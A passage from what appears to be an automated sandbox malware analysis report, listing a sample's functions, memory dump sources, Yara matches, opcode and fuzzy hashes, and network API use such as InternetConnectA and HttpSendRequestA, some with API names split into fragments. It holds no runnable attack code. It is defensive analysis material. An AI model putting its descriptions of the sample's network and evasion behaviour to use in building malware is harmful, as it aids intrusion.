                                                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                • Instruction Fuzzy Hash: B9D017722402147BD610EB98DC89ED77BACDF89760F118465BA1D5B281CA34FA008BE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC870 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtClose.NTDLL(029BE555,00000000,?,029BE555,?,?,?,?,?,?,?,00000000,?,00000000), ref: 029CC895
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                • Instruction ID: 6e043760ed62697eff3ec86f4af2ffb0f70fa88d5c7c8d59538c3817b4b5c97a
                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                • Instruction Fuzzy Hash: 20D012722002147BD610EB98DC45E977B5DDF49660F118455BA1D5B241C530F50086E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f813f013d3c1d3d75b1571af2b55a8035f475a15fb91119418805723e113b17b
                                                                                                • Instruction ID: afc281ba521af357cfa9372277199796abe6ba90ac46326b59545944f0f48ae1
                                                                                                • Opcode Fuzzy Hash: f813f013d3c1d3d75b1571af2b55a8035f475a15fb91119418805723e113b17b
                                                                                                • Instruction Fuzzy Hash: F09002A1652041527945B15944045074006A7E4A87B91C013A1405950C866AE866E661
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: a6d40afb16b1f889181edbcd33edc114cec5e14142457380e98ffb55b3c340b0
                                                                                                • Instruction ID: 43f622362a3446bfc7ae85bb8769c3b961d8085436d976e74135a39759e8eaab
                                                                                                • Opcode Fuzzy Hash: a6d40afb16b1f889181edbcd33edc114cec5e14142457380e98ffb55b3c340b0
                                                                                                • Instruction Fuzzy Hash: E59002B161100413F51161594504707000997D4A87F91C413A0415558D979AD962B161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 8be034704c7a869f4f58b35c3cd70c567a45be808b597dc05983aa794a7f7f37
                                                                                                • Instruction ID: 37061a0a7fc54d2babe2bea25720fb4623520e4fb77c44dee0eafb1abd5b2dd2
                                                                                                • Opcode Fuzzy Hash: 8be034704c7a869f4f58b35c3cd70c567a45be808b597dc05983aa794a7f7f37
                                                                                                • Instruction Fuzzy Hash: F99002A5621000032505A5590704507004697D9B97751C022F1006550CD765D8716161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 040e3f88404a46f1809440837229c5f29aacc40b4bcccea26dd68c6d3accf1f0
                                                                                                • Instruction ID: 754ff820a972540c67adc3a5ca660cd4121a9f910393b9f8dca27ece4cd3a383
                                                                                                • Opcode Fuzzy Hash: 040e3f88404a46f1809440837229c5f29aacc40b4bcccea26dd68c6d3accf1f0
                                                                                                • Instruction Fuzzy Hash: B29002A5631000022545A559060450B0445A7DAB97791C016F1407590CC765D8756361
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: adb486aa753544d82c428a188ea2be2d011e161ac91075d0a0ccef5bbd99f0dc
                                                                                                • Instruction ID: 7f19a5579a843b477dff098c6975e42b7c7f91d76baf6d3d7365dc61299ff7d2
                                                                                                • Opcode Fuzzy Hash: adb486aa753544d82c428a188ea2be2d011e161ac91075d0a0ccef5bbd99f0dc
                                                                                                • Instruction Fuzzy Hash: E39002F161100402F54071594404746000597D4B47F51C012A5055554E879DDDE576A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 044295D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 1d1ab853fd9f964179c04e30c42b972fd97de287c014af641f1e612c36c38057
                                                                                                • Instruction ID: b9d34787d07effa3baa0ddd4481b8f8d0cda67e1a33d5b2b841c4011860f77c7
                                                                                                • Opcode Fuzzy Hash: 1d1ab853fd9f964179c04e30c42b972fd97de287c014af641f1e612c36c38057
                                                                                                • Instruction Fuzzy Hash: AC9002E161200003650571594414616400A97E4A47F51C022E1005590DC669D8A17165
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 044299A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ec13a0092e2ae9836f53880ddd65a06ed701a1a545f4e6411f57fedff4e1f234
                                                                                                • Instruction ID: ef96ef8978b78e98770c740f043ddec1465a955e21ab73aa991ada9819eee8dc
                                                                                                • Opcode Fuzzy Hash: ec13a0092e2ae9836f53880ddd65a06ed701a1a545f4e6411f57fedff4e1f234
                                                                                                • Instruction Fuzzy Hash: 729002E175100442F50061594414B060005D7E5B47F51C016E1055554D875DDC627166
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 04fb6d849d754b462b538a875a43d4cf6ca668ae5aa315ad12e221272c808365
                                                                                                • Instruction ID: 3c459efe41219c9f3b0834b62fedfdc685dec05fabcbb96a929235998e274206
                                                                                                • Opcode Fuzzy Hash: 04fb6d849d754b462b538a875a43d4cf6ca668ae5aa315ad12e221272c808365
                                                                                                • Instruction Fuzzy Hash: D29002B161504842F54071594404A46001597D4B4BF51C012A0055694D9769DD65B6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: c8b56a779339272bb5171bd8f128a62af9db1d5daf4abda7202cc9d179f912d1
                                                                                                • Instruction ID: 9630486438d33adb1f54c5fa5260a1267211c059d13839fe3d9b3d162730bbb5
                                                                                                • Opcode Fuzzy Hash: c8b56a779339272bb5171bd8f128a62af9db1d5daf4abda7202cc9d179f912d1
                                                                                                • Instruction Fuzzy Hash: 6E9002A162180042F60065694C14B07000597D4B47F51C116A0145554CCA59D8716561
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 8503152d561af6dec453504c2ae73318d71a530355b25cae5196dc88deb62ebf
                                                                                                • Instruction ID: 87fa0ac5ae622bf5db14d444d2f47c76384ddefcb17e4a006a855e83484fead4
                                                                                                • Opcode Fuzzy Hash: 8503152d561af6dec453504c2ae73318d71a530355b25cae5196dc88deb62ebf
                                                                                                • Instruction Fuzzy Hash: 8C9002B161100802F5807159440464A000597D5B47F91C016A0016654DCB59DA6977E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d39f8164e494b1d4f350e38089bfc908b2bf7ec8be3ca7b7b3578409d2396a31
                                                                                                • Instruction ID: 31763b8b0e203be214a933d63ce3ec7a35137ee82e6915c9ef3ee5d237aa820b
                                                                                                • Opcode Fuzzy Hash: d39f8164e494b1d4f350e38089bfc908b2bf7ec8be3ca7b7b3578409d2396a31
                                                                                                • Instruction Fuzzy Hash: 559002B1A1500802F55071594414746000597D4B47F51C012A0015654D8799DA6576E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 044296D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 97b2c4d23858ece24a66af2b7f0ace9843748ff502f27362d36da062ddcc0c15
                                                                                                • Instruction ID: c01e3ba2e5b22bde48739fdc06fbae04c1fb95865c69379fcfbbd062925dd8c9
                                                                                                • Opcode Fuzzy Hash: 97b2c4d23858ece24a66af2b7f0ace9843748ff502f27362d36da062ddcc0c15
                                                                                                • Instruction Fuzzy Hash: 5B9002B161100842F50061594404B46000597E4B47F51C017A0115654D8759D8617561
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 044296E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 75a42914869832a9abd1611b73569f8cbb3865462546058b32a2412d9dd4d3fd
                                                                                                • Instruction ID: 3d32b7dfaa6910719b29c01227e8e2ed71c08e105c12e512db3cec8e0e314839
                                                                                                • Opcode Fuzzy Hash: 75a42914869832a9abd1611b73569f8cbb3865462546058b32a2412d9dd4d3fd
                                                                                                • Instruction Fuzzy Hash: FB9002B161108802F5106159840474A000597D4B47F55C412A4415658D87D9D8A17161
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 3fe58857710a9e44f060b795832353094822014b7ca350098795493a5289b2b4
                                                                                                • Instruction ID: 204907b3b24fd7af2bf60b8d0585a1762f50533713539c4b131850584d045665
                                                                                                • Opcode Fuzzy Hash: 3fe58857710a9e44f060b795832353094822014b7ca350098795493a5289b2b4
                                                                                                • Instruction Fuzzy Hash: F59002B161100402F50065995408646000597E4B47F51D012A5015555EC7A9D8A17171
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 0cbbc97e16a8421ab6b5769a636c1b81707e921e8df4c7b38bf7efc2c2ecb230
                                                                                                • Instruction ID: 8bc2cd5480a1899f84a4c87c51e162b01c1ab81c10bd7e62d61e8021d6624782
                                                                                                • Opcode Fuzzy Hash: 0cbbc97e16a8421ab6b5769a636c1b81707e921e8df4c7b38bf7efc2c2ecb230
                                                                                                • Instruction Fuzzy Hash: E49002B172114402F51061598404706000597D5A47F51C412A0815558D87D9D8A17162
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 04429780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ae7d9baeb5aac0c9e7272c5be50877945f52b9ed8509f9f0b2e40c1cd53d2d62
                                                                                                • Instruction ID: 243f97074f1fc7c28e151f06f70a6c28915de74b1d4c177fdbb25f1b22b2b76b
                                                                                                • Opcode Fuzzy Hash: ae7d9baeb5aac0c9e7272c5be50877945f52b9ed8509f9f0b2e40c1cd53d2d62
                                                                                                • Instruction Fuzzy Hash: DD9002A962300002F5807159540860A000597D5A47F91D416A0006558CCA59D8796361
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029B8D70 Relevance: .3, Instructions: 288COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 933a82030efd65e48eb21376ed07fb9c354d133db9039868ba5817a31a160e56
                                                                                                • Instruction ID: 1c759ebdd4b9f06dc7629189eec6d7bc1d04cfc04a88fbf15555808f0fb66635
                                                                                                • Opcode Fuzzy Hash: 933a82030efd65e48eb21376ed07fb9c354d133db9039868ba5817a31a160e56
                                                                                                • Instruction Fuzzy Hash: 88A182B1D00209ABDB15EFA4CD45BEEB7BDFF88304F14856DE609A6140EB70A644CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029B8D6F Relevance: .2, Instructions: 220COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 8bf5f038bec065a4c768a624e34f140e3f4866dbd2cd5fd92ab7a6f5f451a754
                                                                                                • Instruction ID: 6267446afe9c332993a22476e14bb69ddccd368cc5ae95f3d09b76f51d75109c
                                                                                                • Opcode Fuzzy Hash: 8bf5f038bec065a4c768a624e34f140e3f4866dbd2cd5fd92ab7a6f5f451a754
                                                                                                • Instruction Fuzzy Hash: 6271B3B1D00219AADB25EFA0CD44FEEB7BDEFC8304F14456DE609A2140EB70A644CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCDE8 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 49networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 475 29ccde8-29ccdee 476 29ccd78-29ccd7a 475->476 477 29ccdf0-29cce39 call 29cd4c0 475->477 480 29cce3b-29cce61 InternetConnectA 477->480 481 29cce62-29cce68 477->481
                                                                                                APIs
                                                                                                • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?,?,?,?,?), ref: 029CCE5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConnectInternet
                                                                                                • String ID: Conn$ConnectA$Inte$InternetConnectA$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                • API String ID: 3050416762-826804732
                                                                                                • Opcode ID: bc8433160b6504e98f3afd0959b106c85c0ec809cc5cd0c9db9f0bbee9116647
                                                                                                • Instruction ID: 285e52b6cb4bcecee26405dcc279b6dd81d360bd84a2496443dc57baf4eb83c4
                                                                                                • Opcode Fuzzy Hash: bc8433160b6504e98f3afd0959b106c85c0ec809cc5cd0c9db9f0bbee9116647
                                                                                                • Instruction Fuzzy Hash: 23011BB2504118AFCB04DF98D940EEF7BB8EB48314F158299BA0CA7240C630AE108BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCDF0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 482 29ccdf0-29cce39 call 29cd4c0 485 29cce3b-29cce61 InternetConnectA 482->485 486 29cce62-29cce68 482->486
                                                                                                APIs
                                                                                                • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,?,?,?,?,?,?,?,?,?), ref: 029CCE5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConnectInternet
                                                                                                • String ID: Conn$ConnectA$Inte$InternetConnectA$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                • API String ID: 3050416762-826804732
                                                                                                • Opcode ID: 71983777080861565e2327d33b5ac36a658a1413f21eb29ae2fbacb28128aad0
                                                                                                • Instruction ID: 5e717163001995ab6e5b913ef7e3a9269a93ae2f29abcbb1620faebfbf927588
                                                                                                • Opcode Fuzzy Hash: 71983777080861565e2327d33b5ac36a658a1413f21eb29ae2fbacb28128aad0
                                                                                                • Instruction Fuzzy Hash: 7601E9B2915118AFCB14DF98D941EEF7BBCEB48710F158299BE0CA7240D630AE10CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCEF0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 487 29ccef0-29ccf39 call 29cd4c0 490 29ccf3b-29ccf55 HttpSendRequestA 487->490 491 29ccf56-29ccf5c 487->491
                                                                                                APIs
                                                                                                • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,?,?,?,?,?,?), ref: 029CCF4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HttpRequestSend
                                                                                                • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                • API String ID: 360639707-2503632690
                                                                                                • Opcode ID: ab66880bdf277183a7592f59ea32e85dd9e89d3f123f25deabcd15ce0b7996aa
                                                                                                • Instruction ID: 2e9515b41e7b0f51a01cb8bfdcd612ce6c6c8be9b26861fc06851dcb8db40b28
                                                                                                • Opcode Fuzzy Hash: ab66880bdf277183a7592f59ea32e85dd9e89d3f123f25deabcd15ce0b7996aa
